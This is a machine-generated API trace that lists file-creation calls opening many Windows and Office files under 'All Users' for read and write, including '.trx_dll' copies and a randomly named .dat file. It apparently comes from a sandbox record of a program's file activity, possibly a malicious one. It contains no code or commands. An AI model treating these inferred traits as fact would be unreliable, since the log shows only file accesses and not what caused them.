Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\VISINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\WWINTL.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\WWINTL.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\XLINTL32.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\XLINTL32.REST.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OFFICE\UICaptions\3082\XLSLICER.DLL.trx_dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\RAC\PublishedData\RacWmiDatabase.sdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\RAC\StateData\RacDatabase.sdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\RAC\StateData\RacWmiDataBookmarks.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\RAC\StateData\RacWmiEventData.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\SETTINGS.DIA	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\5p5NrGJn0jS HALPmcxz.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\User Account Pictures\user.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-ntkl.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report-2017-07-12.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report-2017-07-26.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report-latest.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-trace.etl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Default Programs.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Speech Recognition.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\NetworkProjection.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
